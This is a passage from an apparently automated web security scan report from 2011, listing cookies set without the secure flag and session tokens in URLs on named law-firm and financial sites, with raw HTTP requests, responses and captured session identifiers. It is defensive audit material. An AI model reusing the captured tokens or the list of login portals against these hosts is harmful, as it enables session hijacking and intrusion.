<title>AMS Legal Collaborator</title>
</head>
<frameset rows="100%,0" border="0">
<frame name="MainPnl" src="Logi
...[SNIP]...

8.5. https://ams-legal.net/tuckerellis/default.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://ams-legal.net
Path:	/tuckerellis/default.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tuckerellis/default.asp HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 403
Content-Type: text/html
Expires: Thu, 12 May 2011 12:25:35 GMT
Set-Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>AMS Legal Collaborator</title>
</head>
<frameset rows="100%,0" border="0">
<frame name="MainPnl" src="Logi
...[SNIP]...

8.6. https://cle-files.tuckerellis.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://cle-files.tuckerellis.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_filetransfer_session=bd9523d5f7e3fb1ae566f67f03d46ec0; path=/; expires=Thu, 19 May 2011 12:25:44 GMT; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: cle-files.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tuckerellis.com/info/client-access
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.9.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Thu, 12 May 2011 12:25:44 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: _filetransfer_session=bd9523d5f7e3fb1ae566f67f03d46ec0; path=/; expires=Thu, 19 May 2011 12:25:44 GMT; HttpOnly
Status: 200
ETag: "db2b9a193cf2f30f9560e02ce35abe4a"
X-Runtime: 33
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta htt
...[SNIP]...

8.7. https://cle-files.tuckerellis.com/password_reset previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://cle-files.tuckerellis.com
Path:	/password_reset

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_filetransfer_session=9f3e69b83e302794ac0d585e9faf9b16; path=/; expires=Thu, 19 May 2011 12:26:02 GMT; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /password_reset HTTP/1.1
Host: cle-files.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://cle-files.tuckerellis.com/
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.9.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West; _filetransfer_session=9f3e69b83e302794ac0d585e9faf9b16

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Thu, 12 May 2011 12:26:02 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: _filetransfer_session=9f3e69b83e302794ac0d585e9faf9b16; path=/; expires=Thu, 19 May 2011 12:26:02 GMT; HttpOnly
Status: 200
ETag: "c35a5d194717fba9ea024de383afe46e"
X-Runtime: 60
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 2532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta htt
...[SNIP]...

8.8. https://cle-files.tuckerellis.com/register previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://cle-files.tuckerellis.com
Path:	/register

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_filetransfer_session=9f3e69b83e302794ac0d585e9faf9b16; path=/; expires=Thu, 19 May 2011 12:25:59 GMT; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /register HTTP/1.1
Host: cle-files.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://cle-files.tuckerellis.com/
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.9.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West; _filetransfer_session=9f3e69b83e302794ac0d585e9faf9b16

Response

8.9. https://secure.reportingsystem.com/TPG/index.cfm previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://secure.reportingsystem.com
Path:	/TPG/index.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

CFID=2712786;expires=Sat, 04-May-2041 11:24:35 GMT;path=/
CFTOKEN=81013834;expires=Sat, 04-May-2041 11:24:35 GMT;path=/
JSESSIONID=4830b14a24305d117a65TR;path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TPG/index.cfm HTTP/1.1
Host: secure.reportingsystem.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:24:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=2712786;HttpOnly;Secure
Set-Cookie: CFTOKEN=81013834;HttpOnly;Secure
Set-Cookie: JSESSIONID=4830b14a24305d117a65TR;HttpOnly;Secure
Set-Cookie: CFID=2712786;expires=Sat, 04-May-2041 11:24:35 GMT;path=/
Set-Cookie: CFTOKEN=81013834;expires=Sat, 04-May-2041 11:24:35 GMT;path=/
Set-Cookie: JSESSIONID=4830b14a24305d117a65TR;path=/
Expires: {ts '2011-05-12 07:24:35'}
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

<META HTT
...[SNIP]...

8.10. https://services.sungarddx.com/Default.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://services.sungarddx.com
Path:	/Default.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASP.NET_SessionId=clqz2055hje3y2npayqilzyg; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.aspx?DN=1,Documents&URL=DN=161476,1,Documents HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=clqz2055hje3y2npayqilzyg; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Date: Thu, 12 May 2011 11:41:31 GMT
Content-Length: 14829

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<script language="javascript">
if (
...[SNIP]...

8.11. https://services.sungarddx.com/common/js/AdminFunctions.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://services.sungarddx.com
Path:	/common/js/AdminFunctions.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASPSESSIONIDAQBBSCRR=EAGLHBFBJGMGAJGCNKJEJDGG; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /common/js/AdminFunctions.asp HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
Referer: https://services.sungarddx.com/Default.aspx?DN=1,Documents&URL=DN=161476,1,Documents
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; ASP.NET_SessionId=y0p1pwqsypoej3ybg3zrlm2v

Response

HTTP/1.1 200 OK
Cache-Control: PUBLIC
Content-Length: 6977
Content-Type: text/html
Expires: Thu, 12 May 2011 23:40:46 GMT
Last-Modified: Thu, 12 May 2011 11:40:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQBBSCRR=EAGLHBFBJGMGAJGCNKJEJDGG; path=/
Date: Thu, 12 May 2011 11:40:46 GMT

//<script language="javascript">
//<!--
///<summary>
///Misc administrative functions
///</summary>
///<scope>both</scope>

///<summary>
/// Used to get into the console and backend stuf
...[SNIP]...

8.12. https://services.sungarddx.com/js/source.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://services.sungarddx.com
Path:	/js/source.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASPSESSIONIDAQBBSCRR=DAGLHBFBNBLDAFJEJOEBHHML; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/source.asp HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
Referer: https://services.sungarddx.com/Default.aspx?DN=1,Documents&URL=DN=161476,1,Documents
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; ASP.NET_SessionId=y0p1pwqsypoej3ybg3zrlm2v

Response

HTTP/1.1 200 OK
Cache-Control: PUBLIC
Content-Length: 92885
Content-Type: application/x-javascript
Expires: Thu, 12 May 2011 23:40:44 GMT
Last-Modified: Thu, 12 May 2011 11:40:44 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQBBSCRR=DAGLHBFBNBLDAFJEJOEBHHML; path=/
Date: Thu, 12 May 2011 11:40:44 GMT

//<!--

///<summary>
/// Attempt to find something to focus on while on the PSI form page
///</summary>
function DoPSIFocus()
{
try
{
var oLogin = document.forms["Inputform"].
...[SNIP]...

8.13. https://webmail.tuckerellis.com/exchweb/bin/auth/owaauth.dll previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://webmail.tuckerellis.com
Path:	/exchweb/bin/auth/owaauth.dll

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

sessionid=15a97208-bb3b-4ddc-80a0-5c9c656a7d79; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /exchweb/bin/auth/owaauth.dll HTTP/1.1
Host: webmail.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://webmail.tuckerellis.com/exchweb/bin/auth/owalogon.asp?url=https://webmail.tuckerellis.com/exchange&reason=0
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.11.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West
Content-Type: application/x-www-form-urlencoded
Content-Length: 117

destination=https%3A%2F%2Fwebmail.tuckerellis.com%2Fexchange&flags=4&username=&password=&SubmitCreds=Log+On&trusted=4

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: https://webmail.tuckerellis.com/exchange
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: sessionid=15a97208-bb3b-4ddc-80a0-5c9c656a7d79; path=/
Set-Cookie: cadata="6WdwQVCBbctZn0rLEzGKc1Dh9KPVSIJ4Y4z3MLg=="; HttpOnly; secure; path=/
Date: Thu, 12 May 2011 12:35:12 GMT

8.14. https://ww3.janus.com/advisor/about-janus previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://ww3.janus.com
Path:	/advisor/about-janus

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=3eb42bec6b9f100ffd3113f47057; Path=/advisor
vj-ww3-advisor=3557560492.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /advisor/about-janus?WT.mc_id=102162&WT.srch=1 HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

8.15. https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.usaa.com
Path:	/inet/imco_mutualfund/ImMutualFunds

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=0001Y8Xm6NLmr5TSgq_ZSnYB1Cq:152vuh6gi; Path=/inet; Domain=.usaa.com
tempCookie=testCookie
dcenv=DCITC; path=/; domain=usaa.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inet/imco_mutualfund/ImMutualFunds?FundGroup=EQ&adid=icmsch105989004 HTTP/1.1
Host: www.usaa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Env: DCITC
Content-Type: text/html
Content-Language: en-US
Date: Thu, 12 May 2011 11:24:17 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=0001Y8Xm6NLmr5TSgq_ZSnYB1Cq:152vuh6gi; Path=/inet; Domain=.usaa.com
Set-Cookie: MemberGlobalSession=2:1001:4WCSMG1D143X7EVESDUQU; Path=/; Domain=.usaa.com; Secure
Set-Cookie: tempCookie=testCookie
Set-Cookie: dcenv=DCITC; path=/; domain=usaa.com
Content-Length: 5180

<html>
<head>
<noscript><meta http-equiv="refresh" content="0; url=https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds?FundGroup=EQ&adid=icmsch105989004&bpjs=false"></noscript>
<script language="J
...[SNIP]...

8.16. https://personal.vanguard.com/us/funds/snapshot previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://personal.vanguard.com
Path:	/us/funds/snapshot

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=4A6B94427C88107C0D0888D5141005F1; Path=/; Domain=.vanguard.com
TLTUID=4A6B94427C88107C0D0888D5141005F1; Path=/; Domain=.vanguard.com; Expires=Thu, 12-05-2021 11:09:22 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1 HTTP/1.1
Host: personal.vanguard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:09:22 GMT
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: TLTSID=4A6B94427C88107C0D0888D5141005F1; Path=/; Domain=.vanguard.com
Set-Cookie: TLTUID=4A6B94427C88107C0D0888D5141005F1; Path=/; Domain=.vanguard.com; Expires=Thu, 12-05-2021 11:09:22 GMT
Content-language: en
Set-cookie: JSESSIONID=0000NlNxb4pkRjQ9SuyVJzXRQ-V:15o5flja9; Path=/; Domain=.vanguard.com; Secure
Set-cookie: SSLB=0; Path=/; Domain=.vanguard.com
Set-Cookie: HNWPRD=D21;path=/;domain=.vanguard.com;
Content-Length: 62217

...[SNIP]...

8.17. https://services.sungarddx.com/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://services.sungarddx.com
Path:	/default.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.aspx?FM=Providence+Funds HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /default.aspx?DN=161476,1,Documents
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Date: Thu, 12 May 2011 11:41:31 GMT
Content-Length: 162
Set-Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fdefault.aspx%3fDN%3d161476%2c1%2cDocuments">here</a>.</h2>
</body></html>

8.18. https://virtualoffice.tuckerellis.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://virtualoffice.tuckerellis.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

sslvpn_AOPortal_virtualoffice.tuckerellis.com=false; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: virtualoffice.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tuckerellis.com/info/employee-access
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.11.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:33:53 GMT
Server: SonicWALL SSL-VPN Web Server
X-UA-Compatible: IE=EmulateIE7
Set-Cookie: sslvpn_AOPortal_virtualoffice.tuckerellis.com=false; path=/;
Keep-Alive: timeout=20, max=25
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 173

<HTML>
<HEAD><meta http-equiv="refresh" content="0; URL=/cgi-bin/welcome">
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</HEAD>
<BODY> </BODY>
</HTML>

8.19. https://ww3.janus.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ww3.janus.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

vj-ww3=3758887084.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vj-ww3-advisor=3540783276.20480.0000

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:23:51 GMT
Content-length: 1078
Content-type: image/x-icon
Etag: "49d1b3b5-1-436-0"
Last-modified: Thu, 05 May 2011 10:16:06 GMT
Accept-ranges: bytes
Set-Cookie: vj-ww3=3758887084.20480.0000; path=/

..............(...&... ..........N...(....... ...........................................]]`.333.........rsu.........DFI.............||~...........[......K...\LK..:.f........++...
..Gn...
+.7....C{..
...[SNIP]...

8.20. https://www.wellsfargo.com/jump/theprivatebank/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.wellsfargo.com
Path:	/jump/theprivatebank/index

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

v1st=860BCE3A6686392; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
wfacookie=B-20110512040747952746006; domain=.wellsfargo.com; expires=Sunday, 09-May-2021 11:07:47 GMT; path=/
ISD_WCM_COOKIE=876747786.16927.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jump/theprivatebank/index HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 12 May 2011 11:07:47 GMT
Content-length: 8767
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: v1st=860BCE3A6686392; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: wcmcookiewf=2YvRNL1DhnQJXpvqtrRMH62pV5nkJ3W9wswYr5TSXhRqMGc2yXqQ!-1621466656; domain=.wellsfargo.com; path=/; secure
Set-Cookie: wfacookie=B-20110512040747952746006; domain=.wellsfargo.com; expires=Sunday, 09-May-2021 11:07:47 GMT; path=/
Content-Language: en-US
Set-Cookie: ISD_WCM_COOKIE=876747786.16927.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/javasc
...[SNIP]...

9. Session token in URL previous next
There are 3 instances of this issue:

http://by.optimost.com/counter/553/-/129/event.js
http://l.sharethis.com/pview
http://www.facebook.com/extern/login_status.php

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

9.1. http://by.optimost.com/counter/553/-/129/event.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://by.optimost.com
Path:	/counter/553/-/129/event.js

Issue detail

The URL in the request appears to contain a session token within the query string:

http://by.optimost.com/counter/553/-/129/event.js?opZone=private-equity&D_ts=1305198189&D_tzo=300&D_loc=http%3A//www.ft.com/indepth/privateequity&D_ckl=222&opFTData=%26v%3D1&opTrackSess=%26t%3D1

Request

GET /counter/553/-/129/event.js?opZone=private-equity&D_ts=1305198189&D_tzo=300&D_loc=http%3A//www.ft.com/indepth/privateequity&D_ckl=222&opFTData=%26v%3D1&opTrackSess=%26t%3D1 HTTP/1.1
Host: by.optimost.com
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Fast
P3p: CP="DEV IND NOI OTC OUR PSA PSD"
Content-Type: application/x-javascript
Expires: Thu, 12 May 2011 11:03:16 GMT
Pragma: no-cache
Date: Thu, 12 May 2011 11:03:16 GMT
Content-Length: 25
Connection: close
Cache-Control: max-age=0, no-cache, no-store

var __counter_unused = 0;

9.2. http://l.sharethis.com/pview previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://l.sharethis.com
Path:	/pview

Issue detail

The URL in the request appears to contain a session token within the query string:

http://l.sharethis.com/pview?event=pview&source=share5x&publisher=c6403dd8-336d-401f-a09b-5b7184ac72dc&hostname=www.mimecast.com&location=%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F&url=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F&sessionID=1305203802369.25147&fpc=303c07d-12fe4358101-13064b3c-1&ts1305203804180.0

Request

